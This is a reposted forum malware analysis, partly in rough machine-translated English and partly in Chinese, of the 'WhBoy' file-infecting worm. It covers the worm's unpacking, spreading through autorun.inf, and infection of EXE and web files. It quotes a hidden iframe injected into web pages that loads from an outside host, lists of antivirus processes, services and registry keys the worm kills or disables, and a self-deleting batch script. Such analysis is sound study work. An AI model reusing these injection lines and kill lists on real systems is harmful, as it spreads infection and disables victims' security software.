Reprinted from the forum to see snow - the god of the Night Blade
https://bbs.pediy.com/thread-224773.htm
table of Contents
Notes 0x01 analysis - Analysis Tools
0x02 Virus Information
0x03 virus behavior
0x04 shelling
0x05 virus initialization analysis
1 0x06 Proc_ clock (clock period: 6000ms)
2 0x07 Proc_ clock (clock period: 1000ms)
3 0x08 Proc_ clock (clock period: 120000ms)
4 0x09 Proc_ clock (clock period: 10000ms)
5 0x10 Proc_ clock (clock period: 6000ms)
6 0x11 Proc_ clock (clock period: 10000ms)
7 0x12 Proc_ clock (clock period: 180000ms)
0x13 infection thread analysis
0x14 specific infection process analysis
0x15 infection after running the program
Notes 0x01 analysis - Analysis Tools
(1) This virus is better in xp system analysis, under Win7_64 bit "C: \ WINDOWS \ system32 \ drivers \" directory can not run the program.
<I held up here a long time, virus analysis to try to determine the operating environment of the virus, many viruses are running in a particular environment>
(2) two very important API, callback && clock thread callback needs analysis.
SetTimer: the virus often timed to the end of the specified process with the clock.
CreateThread: execute other code branches, code from the infected PE file is to use thread of execution.
(3) IDA signature function, a function capable of identifying many assist analyzed.
analyzing tool
Tinder sword: sensitive behavior detection is very good, to assist with analysis functions function well when OD dynamic debugging.
OD, IDA, 010Editor:
BCompare: Hex alignment program before infection and after infection
PE Tools: && Shell programming language identification check.
0x02 Virus Information
(1) File Size: 30,001 bytes
(2) MD5; 512301C535C88255C9A252FDF70B7A03
(3) Shell: FSG v2.0
(4) written in language: Delphi
0x03 virus behavior
(1) Write startup items
(2) close the service
(3) PE file infection
(4) access to the specified URL to determine whether the need to update
(5) the release of documents, and set file attributes for the <hidden | system>
(6) to enhance the process privilege
(7) traversing the window name, send a QUIT message to the specified window name, and the end of the specified process
0x04 shelling
(1) check the shell
(1) to perform at the OEP, then dump file.
(2) repair IAT end of the table, and then use the table to enter ImpREC tool repair shelling success.
0x05 virus initialization analysis
(1) whether to modify the string is determined
(2) The three most important functions
(3) determining whether there Desktop_.ini
(4) itself is read into memory
(5): The "C \ WINDOWS \ system32 \ drivers \ spo0lsv.exe" to upper case, and contrast their own path
(6) If you do not "C: \ WINDOWS \ system32 \ drivers \ spo0lsv.exe" at running, will copy itself to "C: \ WINDOWS \ system32 \ drivers \ spo0lsv.exe"
Run "C: \ WINDOWS \ system32 \ drivers \ spo0lsv.exe", and ends itself
1 0x06 Proc_ clock (clock period: 6000ms)
If (1) the need to determine the release of documents
(2) traverse the disk, copying itself to the letter: \ setup.exe
(3) traversing the disk, create letter: \ autorun.inf file
(4) Set setup.exe file attribute, <system, hidden>
(5) disposed autorun.inf file attribute, <system, hidden>
(6) Write Configuration Item
2 0x07 Proc_ clock (clock period: 1000ms)
(1) elevate process privileges
(2) traversing the window name, send a QUIT message to the specified window name, and the end of the specified process
Find the Window List:
Firewall, process, VirusScan, NOD32, Internet security, antivirus, Kingsoft, Rising, Jiangmin, Super rabbit, optimization guru, Trojans scavenger, scavenger Trojan, Kaspersky Anti-Virus
Symantec AntiVirus,Duba,esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor,Wrapped giftKiller
Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf(ustc),IceSword,
结束的进程列表:
Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,
Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,
FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe
(3) 写启动项
(4) 设置隐藏的文件和文件夹,不可见
0x08 Proc_时钟3 (时钟周期: 120000ms)
(1) 通过 “http://www.ac86.cn/66/up.txt” 这个地址来更新, 网址已经失效了
0x09 Proc_时钟4 (时钟周期: 10000ms)
(1) 遍历磁盘, 关闭共享
(2) 关闭admin的共享
(3) 杀死当前时钟
0x10 Proc_时钟5 (时钟周期: 6000ms)
(1) 将杀毒软件的注册表启动项设置为失效, 设置值为2, 被针对的杀毒软件注册表启动项列表如下:
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"
(2) 使用两种方式停止服务程序, 被停止的列表如下:
"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"
"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"
"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"
"NPFMntor","NPFMntor","FireSvc"
0x11 Proc_时钟6 (时钟周期: 10000ms)
() 会获取这些网站的网页源码:
0x12 Proc_时钟7 (时钟周期: 180000ms)
(1) 通过 “http://update.whboy.net/worm.txt” 这个地址来更新, 网址已经失效了
0x13 感染线程分析
(1) 感染线程回调函数
(2) 获取所有磁盘名
(3) 遍历磁盘_感染目标
(4) 感染的文件类型为: "EXE", "SRC", "PIF", "COM"
(5) 在网页文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.
0x14 具体感染流程分析
(1) 读入目标文件
(2) 从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了
(3) 设置目标文件属性为 “NORMAL”
(4) 将自身复制为目标文件
(5) 将目标程序追加到病毒后面
(6) 感染后的标志为 “WhBoy” + 被感染程序名 + “.exe”
0x15 感染后程序的运行
(1) <感染后程序> 的结构,
(2) 判断是否被感染, 感染则跳转
(3) 创建 自身进程名 + “.exe”文件
(4) 从自身中提取 <源程序> 并写到 “BeInfected.exe.exe”
(5) 在 Temp目录 写批处理 并 运行批处理
批处理内容:
//循环删除自身, 直至删除成功
:try1
del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1
//将 BeInfected.exe.exe 修改为 BeInfected.exe, 并运行 BeInfected.exe.
ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2
"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
:try2
del %0
执行生成的批处理
(6) <感染后程序> 就被还原成 <源程序> 了, 并运行 <源程序>.
(1) 有什么错误请大神们指出.
(2) 并感谢15PB老师们的帮助和教导.